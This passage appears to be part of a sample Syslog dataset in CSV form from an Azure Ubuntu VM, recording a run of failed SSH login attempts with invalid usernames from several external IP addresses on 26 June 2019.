+18525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:25:36,UbuntuDevEnv,2019-06-26 10:25:36,auth,UbuntuDevEnv,info,Disconnected from invalid user ethos 37.59.6.106 port 56488 [preauth],84387,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ethos,37.59.6.1,56488,,
+18526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:25:36,UbuntuDevEnv,2019-06-26 10:25:36,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 56488:11: Bye Bye [preauth],84387,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,56488,,
+18527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:25:38,UbuntuDevEnv,2019-06-26 10:25:38,auth,UbuntuDevEnv,info,Failed password for invalid user murai1 from 188.226.250.187 port 56719 ssh2,84384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,murai1,188.226.250.1,56719,,
+18528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:25:38,UbuntuDevEnv,2019-06-26 10:25:38,auth,UbuntuDevEnv,info,Disconnected from invalid user murai1 188.226.250.187 port 56719 [preauth],84384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,murai1,188.226.250.1,56719,,
+18529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:25:38,UbuntuDevEnv,2019-06-26 10:25:38,auth,UbuntuDevEnv,info,"Received disconnect from 188.226.250.187 port 56719:11: Normal Shutdown, Thank you for playing [preauth]",84384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.226.250.1,56719,,
+18530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:26:18,UbuntuDevEnv,2019-06-26 10:26:18,auth,UbuntuDevEnv,info,Invalid user test1 from 47.44.115.81 port 37388,84538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,47.44.115.8,37388,,
+18531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:26:18,UbuntuDevEnv,2019-06-26 10:26:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,84538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:26:18,UbuntuDevEnv,2019-06-26 10:26:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,84538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:26:20,UbuntuDevEnv,2019-06-26 10:26:20,auth,UbuntuDevEnv,info,Failed password for invalid user test1 from 47.44.115.81 port 37388 ssh2,84538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,47.44.115.8,37388,,
+18534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:26:20,UbuntuDevEnv,2019-06-26 10:26:20,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 37388:11: Bye Bye [preauth],84538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,37388,,
+18535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:26:20,UbuntuDevEnv,2019-06-26 10:26:20,auth,UbuntuDevEnv,info,Disconnected from invalid user test1 47.44.115.81 port 37388 [preauth],84538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,47.44.115.8,37388,,
+18536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:27:03,UbuntuDevEnv,2019-06-26 10:27:03,auth,UbuntuDevEnv,info,Invalid user deploy from 37.59.6.106 port 45168,84704,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,37.59.6.1,45168,,
+18537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:27:03,UbuntuDevEnv,2019-06-26 10:27:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,84704,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:27:03,UbuntuDevEnv,2019-06-26 10:27:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,84704,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:27:04,UbuntuDevEnv,2019-06-26 10:27:04,auth,UbuntuDevEnv,info,Failed password for invalid user deploy from 37.59.6.106 port 45168 ssh2,84704,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,37.59.6.1,45168,,
+18540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:27:04,UbuntuDevEnv,2019-06-26 10:27:04,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy 37.59.6.106 port 45168 [preauth],84704,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,37.59.6.1,45168,,
+18541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:27:04,UbuntuDevEnv,2019-06-26 10:27:04,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 45168:11: Bye Bye [preauth],84704,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,45168,,
+18542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:27:24,UbuntuDevEnv,2019-06-26 10:27:24,auth,UbuntuDevEnv,info,Invalid user mariajose from 200.209.174.76 port 42147,84777,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mariajose,200.209.174.7,42147,,
+18543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:27:24,UbuntuDevEnv,2019-06-26 10:27:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.209.174.76,84777,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.209.174.7,,0,
+18544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:27:24,UbuntuDevEnv,2019-06-26 10:27:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,84777,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:27:26,UbuntuDevEnv,2019-06-26 10:27:26,auth,UbuntuDevEnv,info,Failed password for invalid user mariajose from 200.209.174.76 port 42147 ssh2,84777,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mariajose,200.209.174.7,42147,,
+18546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:27:26,UbuntuDevEnv,2019-06-26 10:27:26,auth,UbuntuDevEnv,info,Received disconnect from 200.209.174.76 port 42147:11: Bye Bye [preauth],84777,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,42147,,
+18547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:27:26,UbuntuDevEnv,2019-06-26 10:27:26,auth,UbuntuDevEnv,info,Disconnected from invalid user mariajose 200.209.174.76 port 42147 [preauth],84777,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mariajose,200.209.174.7,42147,,
+18548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:24,UbuntuDevEnv,2019-06-26 10:28:23,auth,UbuntuDevEnv,info,Invalid user edu from 47.44.115.81 port 54630,84984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edu,47.44.115.8,54630,,
+18549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:24,UbuntuDevEnv,2019-06-26 10:28:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,84984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:24,UbuntuDevEnv,2019-06-26 10:28:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,84984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:26,UbuntuDevEnv,2019-06-26 10:28:25,auth,UbuntuDevEnv,info,Failed password for invalid user edu from 47.44.115.81 port 54630 ssh2,84984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edu,47.44.115.8,54630,,
+18552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:26,UbuntuDevEnv,2019-06-26 10:28:25,auth,UbuntuDevEnv,info,Disconnected from invalid user edu 47.44.115.81 port 54630 [preauth],84984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edu,47.44.115.8,54630,,
+18553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:26,UbuntuDevEnv,2019-06-26 10:28:25,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 54630:11: Bye Bye [preauth],84984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,54630,,
+18554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:31,UbuntuDevEnv,2019-06-26 10:28:30,auth,UbuntuDevEnv,info,Invalid user bran from 37.59.6.106 port 33840,85014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bran,37.59.6.1,33840,,
+18555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:31,UbuntuDevEnv,2019-06-26 10:28:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,85014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:31,UbuntuDevEnv,2019-06-26 10:28:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:33,UbuntuDevEnv,2019-06-26 10:28:32,auth,UbuntuDevEnv,info,Failed password for invalid user bran from 37.59.6.106 port 33840 ssh2,85014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bran,37.59.6.1,33840,,
+18558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:33,UbuntuDevEnv,2019-06-26 10:28:32,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 33840:11: Bye Bye [preauth],85014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,33840,,
+18559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:33,UbuntuDevEnv,2019-06-26 10:28:32,auth,UbuntuDevEnv,info,Disconnected from invalid user bran 37.59.6.106 port 33840 [preauth],85014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bran,37.59.6.1,33840,,
+18560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:47,UbuntuDevEnv,2019-06-26 10:28:46,auth,UbuntuDevEnv,info,Invalid user ocelot from 200.209.174.76 port 46378,85072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ocelot,200.209.174.7,46378,,
+18561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:47,UbuntuDevEnv,2019-06-26 10:28:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:47,UbuntuDevEnv,2019-06-26 10:28:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.209.174.76,85072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.209.174.7,,0,
+18563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:48,UbuntuDevEnv,2019-06-26 10:28:48,auth,UbuntuDevEnv,info,Failed password for invalid user ocelot from 200.209.174.76 port 46378 ssh2,85072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ocelot,200.209.174.7,46378,,
+18564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:48,UbuntuDevEnv,2019-06-26 10:28:48,auth,UbuntuDevEnv,info,Disconnected from invalid user ocelot 200.209.174.76 port 46378 [preauth],85072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ocelot,200.209.174.7,46378,,
+18565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:28:48,UbuntuDevEnv,2019-06-26 10:28:48,auth,UbuntuDevEnv,info,Received disconnect from 200.209.174.76 port 46378:11: Bye Bye [preauth],85072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,46378,,
+18566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:29:55,UbuntuDevEnv,2019-06-26 10:29:55,auth,UbuntuDevEnv,info,Invalid user spark from 37.59.6.106 port 50746,85320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,spark,37.59.6.1,50746,,
+18567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:29:55,UbuntuDevEnv,2019-06-26 10:29:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,85320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:29:55,UbuntuDevEnv,2019-06-26 10:29:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:29:57,UbuntuDevEnv,2019-06-26 10:29:56,auth,UbuntuDevEnv,info,Failed password for invalid user spark from 37.59.6.106 port 50746 ssh2,85320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,spark,37.59.6.1,50746,,
+18570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:29:57,UbuntuDevEnv,2019-06-26 10:29:56,auth,UbuntuDevEnv,info,Disconnected from invalid user spark 37.59.6.106 port 50746 [preauth],85320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,spark,37.59.6.1,50746,,
+18571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:29:57,UbuntuDevEnv,2019-06-26 10:29:56,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 50746:11: Bye Bye [preauth],85320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,50746,,
+18572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:30:23,UbuntuDevEnv,2019-06-26 10:30:22,auth,UbuntuDevEnv,info,Invalid user english from 47.44.115.81 port 43648,85446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,english,47.44.115.8,43648,,
+18573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:30:23,UbuntuDevEnv,2019-06-26 10:30:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:30:23,UbuntuDevEnv,2019-06-26 10:30:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,85446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:30:25,UbuntuDevEnv,2019-06-26 10:30:24,auth,UbuntuDevEnv,info,Failed password for invalid user english from 47.44.115.81 port 43648 ssh2,85446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,english,47.44.115.8,43648,,
+18576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:30:25,UbuntuDevEnv,2019-06-26 10:30:25,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 43648:11: Bye Bye [preauth],85446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,43648,,
+18577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:30:25,UbuntuDevEnv,2019-06-26 10:30:25,auth,UbuntuDevEnv,info,Disconnected from invalid user english 47.44.115.81 port 43648 [preauth],85446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,english,47.44.115.8,43648,,
+18578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:30:35,UbuntuDevEnv,2019-06-26 10:30:34,auth,UbuntuDevEnv,info,Invalid user hun from 106.13.142.247 port 52882,85541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hun,106.13.142.2,52882,,
+18579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:30:35,UbuntuDevEnv,2019-06-26 10:30:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,85541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:30:35,UbuntuDevEnv,2019-06-26 10:30:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:30:37,UbuntuDevEnv,2019-06-26 10:30:37,auth,UbuntuDevEnv,info,Failed password for invalid user hun from 106.13.142.247 port 52882 ssh2,85541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hun,106.13.142.2,52882,,
+18582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:30:37,UbuntuDevEnv,2019-06-26 10:30:37,auth,UbuntuDevEnv,info,Disconnected from invalid user hun 106.13.142.247 port 52882 [preauth],85541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hun,106.13.142.2,52882,,
+18583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:30:37,UbuntuDevEnv,2019-06-26 10:30:37,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 52882:11: Bye Bye [preauth],85541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,52882,,
+18584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:31:26,UbuntuDevEnv,2019-06-26 10:31:26,auth,UbuntuDevEnv,info,Invalid user nei from 37.59.6.106 port 39438,85735,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nei,37.59.6.1,39438,,
